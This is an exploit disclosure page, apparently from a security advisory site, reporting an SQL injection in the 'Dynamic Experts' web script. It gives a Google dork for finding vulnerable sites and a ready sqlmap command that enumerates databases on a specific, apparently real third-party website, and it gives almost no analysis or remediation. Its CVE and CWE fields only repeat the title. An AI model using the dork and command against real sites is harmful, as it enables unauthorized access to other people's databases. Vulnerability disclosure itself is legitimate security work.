Dynamic Experts script SQL Injection Vulnerability

2021.03.21
az Tural Asadov (AZ) az
Risk: Medium
Local: No
Remote: Yes
CVE: Dynamic Experts script SQL Injection Vulnerability
CWE: Dynamic Experts script SQL Injection Vulnerability
Dork: "Powered By Dynamic Experts"

********************************************************* #Exploit Title: Dynamic Experts script Sql Injection Vulnerability #Date: 20.03.2021 #Exploit Author: Thor/Azerbaijan #Google Dork: "Powered By Dynamic Experts" inurl:/"Powered By Dynamic Experts" intext:/"Powered By Dynamic Experts" #Tested OS: Linux/Parrot (SQLMAP TOOL) ERROR: Database query failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 1' at line 1 #iNJECT MODE: sqlmap -u https://zateen.com/contact.php?id=5 --dbs ********************************************************* #Discovered by: Tural Asadov #Instagram: @esedov__7.62 #Email: turalasadov915@gmail.com *********************************************************


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top